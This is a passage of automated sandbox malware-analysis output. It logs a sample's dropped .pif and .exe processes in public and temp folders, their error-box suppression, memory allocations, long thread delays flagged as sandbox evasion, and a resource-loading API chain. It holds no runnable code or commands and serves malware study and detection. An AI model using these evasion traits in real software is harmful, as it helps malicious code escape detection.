          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\ndpha.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\fptrsiaN.pifProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 2850000 memory commit 500064256
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 2851000 memory commit 500154368
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 2876000 memory commit 500002816
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 2877000 memory commit 500068352
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 2887000 memory commit 501014528
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 297F000 memory commit 500006912
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 2980000 memory commit 500015104
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 29C0000 memory commit 500064256Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 29C1000 memory commit 500154368Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 29E6000 memory commit 500002816Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 29E7000 memory commit 500068352Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 29F7000 memory commit 501014528Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2AEF000 memory commit 500006912Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2AF0000 memory commit 500015104Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 2890000 memory commit 500064256Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 2891000 memory commit 500154368Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 28B6000 memory commit 500002816Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 28B7000 memory commit 500068352Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 28C7000 memory commit 501014528Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 29BF000 memory commit 500006912Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFMemory allocated: 29C0000 memory commit 500015104Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMemory allocated: 1CF70000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMemory allocated: 1D2A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMemory allocated: 1D1C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMemory allocated: 21920000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMemory allocated: 21D90000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMemory allocated: 21A20000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMemory allocated: 30D00000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMemory allocated: 310F0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMemory allocated: 30F10000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,6_2_004019F0
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599873Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599765Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599541Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599396Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599224Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599104Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598985Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598860Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598735Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598610Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598485Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598360Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598235Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598110Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597985Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597860Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597735Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597610Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597485Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597360Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597235Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597110Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596985Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596860Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596682Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596576Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596465Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596344Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596219Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596110Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595985Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595860Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595703Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595592Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595485Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595360Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595235Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595110Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594985Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594861Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594735Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594609Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594475Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594368Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594242Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594132Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593799Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593503Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593306Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593168Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593034Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592787Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592648Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592506Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592315Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592141Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592000Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591878Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591741Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591617Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591362Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599829
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599701
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599583
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599462
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599350
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599237
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599125
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599016
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598872
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598725
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598591
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598443
